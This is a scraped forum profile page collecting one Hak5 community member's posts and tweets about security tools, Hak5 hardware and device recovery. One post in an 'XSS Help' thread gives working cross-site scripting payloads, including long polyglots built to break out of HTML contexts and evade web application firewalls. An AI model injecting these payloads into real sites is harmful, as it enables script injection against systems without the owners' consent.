Jump to content

zoro25

Active Members
  • Posts

    82
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by zoro25

  1. @nest are there plans to link facial recognition to https://t.co/hEW9dj8Cuz it seems backward that I have to relink… https://t.co/nRpvfOP2NQ

  2. A Krack module would be nice - - - -just putting it out there
  3. @firt @kickstarter @elonmusk Been there and had the same thing happen, @kickstarter won't do anything, In my case,… https://t.co/wtR4kI6fKI

  4. Just saw that you already mention Builtwith, That's who I use to profile things like this. https://builtwith.com/hak5.com They also have a browser plugin, It's very easy to use their API or just scrape for an app you would write yourself. I also use TCPIPUtils for looking up networking info, (subdomains etc) https://www.tcpiputils.com/browse/domain/hak5.com I then also do a few other things, but builtwith and TCPIPUtlis are my main 2
  5. zoro25

    XSS Help

    Also, I would suggest looking in the console of your browser for errors when injecting. As already mentioned without knowing the app or js/html of page it's hard to give a working payload However, you can try either -->'";</ScriPT><sCriPt><confirm()</scRiPt> Which may better break out of the HTML and is nice and short (similar to what you tried but I included single and double quotes and also the end of a comment just in case you end up in a comment section. Or you can try a polyglot injection payload, (these will usually set off a WebApp Firewall but feel free to try) javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>"><img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" Or jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!-- which are both attempting to do the same thing. Good luck . ***** EDIT While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image, This is the equivalent of <img src="x" /> From here you would just need to tweak the code to pop an alert on a broken image, remember to read the console and attempt to bypassing protections. onerror=confirm() or something similar for a basic pop on a broken image. ****
  6. @CrookdHillary @MatthewKick No idea where you get your 0-6months as Cornell law , https://t.co/tPgUmFHu6X states 5 years max

  7. @testertested Never feel bad about screwing up, we all that (in one way or another). The fact that you realized it… https://t.co/syGpmMyjPX

  8. @mattbarcomb I've worked at 3 companies where this is encouraged @CPM__UK @Microsoft & @Skype, 1 of the 54 likes th… https://t.co/2S6ycD1qvk

  9. I think you guys are missing the R&D costs, If you look at Seytonic he pushes (or sells) Malduino but the Malduino uses DuckyScript as it's language. Who invented DuckyScript . Hak5 , OKay so it's not massively hard to come up with a new simple scripting language or even using the Malduino for USB automation, but no one else did it in a small easy to use package. That's what Hak5 brings, ease of use and some resemblance of support (I say resemblance as most of the support is from the community so it's hit or miss) . Sure you can do a lot of the pineapple stuff via a Linux OS with your network cards in Promiscuous mode but the Pineapples just give you a nice small package which to carry out your engagement. Seytonic is great and his guides are awesome for those with less cash, but lots of Hak5 customers are businesses/Govt agencies or just people with a passion for security who don't mind paying a little extra for the community. Hak5 if anything has been a bit of victim of its success and its customer base grew massively over the last few years (pineapple5 onwards) and it seems only now the dev team is beginning to catch up to cope with that larger customer expectation. Bringing Seb was a good start back at the start of Pineapple5, but he and Darren have always been swamped. For example almost 2 weeks after the source for Kracked was leaked (openly available) which is the biggest thing to happen to WIFI in about 10 years , The pineapples still haven't got modules/new firmware (in fact while I'm on it the firmware is over a year old) Lets hope with the larger Dev team things get better.
  10. Does anyone know anything about that "Friday thing" mentioned in today's Hak5 video? or what I'm guessing is a new PineApple firmware release or at least a new Krack module ****EDIT**** (after watching it back it seems that the Friday thing may have been last weeks Packet Squirrel announcement, I watched the recorded streams but didn't see anything new pineapple or Krack related)
  11. @smartthings @nvidiashield Thanks for the clarification

  12. @Random_Robbie Good work ,

  13. @sxcurity Yes that's it, thanks

  14. Remember to say to yourself that this is just a moment and it will pass. Now may seem dark and gray but it will pa… https://t.co/FeUw2pNNUf

  15. @troyhunt Tipple Wammy :-(

  16. @SymbianSyMoh Here's another https://t.co/P9QIYRkntZ

  17. @indi303 @SteveD3 @nite0wl @ladymerlin @dontlook Sparrows is fairly decent , with good quality locks for learning (… https://t.co/lP9TB9jPvx

  18. +1 for Google Security team who 3 times now have closed my security holes before I got a chance to report them (damn they are quick)

  19. @disclosedh1 Mouse Over in Opera Browser will still show Ebay rather than the punycode URL - However this is a brow… https://t.co/up8KvvxbbJ

  20. @teroalhonen Windows Team PM, How can we reduce the number of blue screen error Windows Team Dev, Leave it to me ey… https://t.co/K1TbtDURFt

  21. I've now been put in contact with them, Thanks to all who helped :-)

  22. @jcran @Viss @r00tninja @jeremiahg @michenriksen Tool completed , after a long while it came back with Wrote 545 ho… https://t.co/6AnrJPGewr

  23. @lukasco 'foo' + 'foo' //string plus string "foofoo" 'foo' + + 'foo'//string plus plus string? "fooNaN" '5' + - '2'… https://t.co/jVnDRDS02T

  24. It never goes through the upgrade process, just goes straight from green to blinking blue. I'll try and do a recovery **EDIT** All good after the recovery, device must have been in a weird state, for anyone else who gets same issue to fix, insert and pull it out as soon as the green light turns off (do this 3 times) on the 4th insert it will go into recovery mode. Once this is done remove the bunny (use the safe removal feature on windows) and then making sure that you have the file still in root insert the bunny again and it will flash the new firmware. As LVT mentioned above after the flash of new firmware you should have a text file called version.txt inside should be 1.1_228 PS LowValueTarget thanks for the help and advice above :-)
×
×
  • Create New...